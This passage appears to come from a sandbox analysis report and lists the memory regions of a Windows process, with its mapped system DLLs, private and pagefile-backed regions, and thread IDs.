end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 5335
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 5336
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 5337
start_va = 0x7fef8880000
end_va = 0x7fef888dfff
monitored = 0
entry_point = 0x7fef8885500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 5338
start_va = 0x7fefa260000
end_va = 0x7fefa2d6fff
monitored = 0
entry_point = 0x7fefa29e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 5339
start_va = 0x7fefd5e0000
end_va = 0x7fefd601fff
monitored = 0
entry_point = 0x7fefd5e5d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 5340
start_va = 0x7fefdb20000
end_va = 0x7fefdb5cfff
monitored = 0
entry_point = 0x7fefdb218f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 5341
start_va = 0x1e50000
end_va = 0x211efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 5345
start_va = 0x21b0000
end_va = 0x222ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021b0000"
filename = ""
Region:
id = 5346
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 5347
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 5348
start_va = 0x1bc0000
end_va = 0x1c04fff
monitored = 0
entry_point = 0x1bc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5349
start_va = 0x1bc0000
end_va = 0x1c04fff
monitored = 0
entry_point = 0x1bc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5350
start_va = 0x1bc0000
end_va = 0x1c04fff
monitored = 0
entry_point = 0x1bc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5351
start_va = 0x1bc0000
end_va = 0x1c04fff
monitored = 0
entry_point = 0x1bc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5352
start_va = 0x1bc0000
end_va = 0x1c04fff
monitored = 0
entry_point = 0x1bc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5353
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5354
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 5355
start_va = 0x1d10000
end_va = 0x1d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d10000"
filename = ""
Region:
id = 5356
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 5357
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 5358
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 5359
start_va = 0x7fef8220000
end_va = 0x7fef8232fff
monitored = 0
entry_point = 0x7fef8221d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 5360
start_va = 0x7fef88c0000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x7fef8938b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 5361
start_va = 0x7fef8890000
end_va = 0x7fef88b6fff
monitored = 0
entry_point = 0x7fef88911a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 5476
start_va = 0x7fef7c30000
end_va = 0x7fef7c50fff
monitored = 0
entry_point = 0x7fef7c403b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 5477
start_va = 0x450000
end_va = 0x454fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmiutils.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmiutils.dll.mui")
Thread:
id = 258
os_tid = 0x528
Thread:
id = 259
os_tid = 0x45c
Thread:
id = 260
os_tid = 0x448
Thread:
id = 261
os_tid = 0x568
Thread:
id = 262
os_tid = 0x510